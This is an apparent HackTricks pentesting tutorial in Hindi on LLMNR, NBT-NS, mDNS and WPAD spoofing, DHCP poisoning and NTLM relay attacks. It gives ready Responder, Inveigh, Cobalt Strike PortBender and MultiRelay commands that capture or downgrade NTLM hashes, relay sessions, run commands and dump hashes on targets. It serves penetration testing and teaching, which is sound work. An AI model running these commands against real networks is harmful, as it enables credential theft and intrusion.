# Spoofing LLMNR, NBT-NS, mDNS/DNS और WPAD और Relay Attacks

{{#include ../../banners/hacktricks-training.md}}

## Network Protocols

### Local Host Resolution Protocols

- **LLMNR, NBT-NS, और mDNS**:
- Microsoft और अन्य ऑपरेटिंग सिस्टम DNS विफल होने पर स्थानीय नाम समाधान के लिए LLMNR और NBT-NS का उपयोग करते हैं। इसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।
- ये प्रोटोकॉल UDP पर अपनी अनधिकृत, प्रसारण प्रकृति के कारण इंटरसेप्शन और स्पूफिंग के प्रति संवेदनशील हैं।
- [Responder](https://github.com/lgandx/Responder) का उपयोग इन प्रोटोकॉल को क्वेरी करने वाले होस्ट को जाली प्रतिक्रियाएँ भेजकर सेवाओं का अनुकरण करने के लिए किया जा सकता है।
- Responder का उपयोग करके सेवा अनुकरण पर अधिक जानकारी [यहाँ](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) मिल सकती है।

### Web Proxy Auto-Discovery Protocol (WPAD)

- WPAD ब्राउज़रों को स्वचालित रूप से प्रॉक्सी सेटिंग्स खोजने की अनुमति देता है।
- खोज DHCP, DNS, या DNS विफल होने पर LLMNR और NBT-NS पर वापस जाकर की जाती है।
- Responder WPAD हमलों को स्वचालित कर सकता है, ग्राहकों को दुर्भावनापूर्ण WPAD सर्वरों की ओर निर्देशित करता है।

### Responder for Protocol Poisoning

- **Responder** एक उपकरण है जिसका उपयोग LLMNR, NBT-NS, और mDNS क्वेरीज़ को ज़हर देने के लिए किया जाता है, जो क्वेरी प्रकारों के आधार पर चयनात्मक रूप से प्रतिक्रिया करता है, मुख्य रूप से SMB सेवाओं को लक्षित करता है।
- यह Kali Linux में पूर्व-स्थापित आता है, जिसे `/etc/responder/Responder.conf` पर कॉन्फ़िगर किया जा सकता है।
- Responder स्क्रीन पर कैप्चर किए गए हैश प्रदर्शित करता है और उन्हें `/usr/share/responder/logs` निर्देशिका में सहेजता है।
- यह IPv4 और IPv6 दोनों का समर्थन करता है।
- Responder का Windows संस्करण [यहाँ](https://github.com/lgandx/Responder-Windows) उपलब्ध है।

#### Running Responder

- डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: `responder -I <Interface>`
- अधिक आक्रामक प्रोबिंग के लिए (संभावित दुष्प्रभावों के साथ): `responder -I <Interface> -P -r -v`
- आसान क्रैकिंग के लिए NTLMv1 चुनौतियों/प्रतिक्रियाओं को कैप्चर करने की तकनीकें: `responder -I <Interface> --lm --disable-ess`
- WPAD अनुकरण को सक्रिय किया जा सकता है: `responder -I <Interface> --wpad`
- NetBIOS अनुरोधों को हमलावर के IP पर हल किया जा सकता है, और एक प्रमाणीकरण प्रॉक्सी स्थापित की जा सकती है: `responder.py -I <interface> -Pv`

### DHCP Poisoning with Responder

- DHCP प्रतिक्रियाओं को स्पूफ करना एक पीड़ित की रूटिंग जानकारी को स्थायी रूप से ज़हर दे सकता है, ARP ज़हर देने के लिए एक अधिक छिपा हुआ विकल्प प्रदान करता है।
- यह लक्षित नेटवर्क की कॉन्फ़िगरेशन के बारे में सटीक ज्ञान की आवश्यकता होती है।
- हमले को चलाना: `./Responder.py -I eth0 -Pdv`
- यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क में व्यवधान से बचने के लिए सावधानीपूर्वक हैंडलिंग की आवश्यकता होती है।

### Capturing Credentials with Responder

- Responder उपरोक्त प्रोटोकॉल का उपयोग करके सेवाओं का अनुकरण करेगा, जब एक उपयोगकर्ता स्पूफ की गई सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है, तो क्रेडेंशियल्स (आमतौर पर NTLMv2 Challenge/Response) कैप्चर करता है।
- NetNTLMv1 में डाउनग्रेड करने या आसान क्रेडेंशियल क्रैकिंग के लिए ESS को निष्क्रिय करने का प्रयास किया जा सकता है।

यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाना चाहिए, उचित प्राधिकरण सुनिश्चित करना और व्यवधान या अनधिकृत पहुंच से बचना चाहिए।

## Inveigh

Inveigh एक उपकरण है जो पेनिट्रेशन टेस्टर्स और रेड टीमर्स के लिए डिज़ाइन किया गया है, जो Windows सिस्टम के लिए है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, जिसमें [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) और [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देश [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) में मिल सकते हैं।

Inveigh को PowerShell के माध्यम से संचालित किया जा सकता है:
```powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
या C# बाइनरी के रूप में निष्पादित किया गया:
```bash
Inveigh.exe
```
### NTLM Relay Attack

यह हमला SMB प्रमाणीकरण सत्रों का उपयोग करके एक लक्षित मशीन तक पहुँचने के लिए किया जाता है, यदि सफल हो तो एक सिस्टम शेल प्रदान करता है। मुख्य पूर्वापेक्षाएँ शामिल हैं:

- प्रमाणीकरण करने वाले उपयोगकर्ता को रिले किए गए होस्ट पर स्थानीय व्यवस्थापक पहुँच होनी चाहिए।
- SMB साइनिंग को अक्षम किया जाना चाहिए।

#### 445 Port Forwarding and Tunneling

उन परिदृश्यों में जहाँ सीधे नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफ़िक को अग्रेषित और टनल करने की आवश्यकता होती है। [**PortBender**](https://github.com/praetorian-inc/PortBender) जैसे उपकरण पोर्ट 445 के ट्रैफ़िक को दूसरे पोर्ट पर पुनर्निर्देशित करने में मदद करते हैं, जो तब आवश्यक होता है जब ड्राइवर लोड करने के लिए स्थानीय व्यवस्थापक पहुँच उपलब्ध हो।

PortBender सेटअप और संचालन Cobalt Strike में:
```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### NTLM रिले हमले के लिए अन्य उपकरण

- **Metasploit**: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें।
- **smbrelayx**: SMB सत्रों को रिले करने और कमांड निष्पादित करने या बैकडोर तैनात करने के लिए एक Python स्क्रिप्ट।
- **MultiRelay**: Responder सूट से एक उपकरण जो विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड निष्पादित करने या हैश डंप करने के लिए है।

यदि आवश्यक हो, तो प्रत्येक उपकरण को SOCKS प्रॉक्सी के माध्यम से संचालित करने के लिए कॉन्फ़िगर किया जा सकता है, जिससे अप्रत्यक्ष नेटवर्क पहुंच के साथ भी हमले सक्षम होते हैं।

### MultiRelay संचालन

MultiRelay _**/usr/share/responder/tools**_ निर्देशिका से निष्पादित किया जाता है, विशिष्ट IPs या उपयोगकर्ताओं को लक्षित करता है।
```bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic
```
ये उपकरण और तकनीकें विभिन्न नेटवर्क वातावरण में NTLM Relay हमलों को करने के लिए एक व्यापक सेट बनाती हैं।

### NTLM लॉगिन को मजबूर करना

Windows में आप **कुछ विशेषाधिकार प्राप्त खातों को मनमाने मशीनों पर प्रमाणीकरण करने के लिए मजबूर कर सकते हैं**। जानने के लिए निम्नलिखित पृष्ठ पढ़ें:

{{#ref}}
../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
{{#endref}}

## संदर्भ

- [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
- [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
- [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
- [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
- [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)

{{#include ../../banners/hacktricks-training.md}}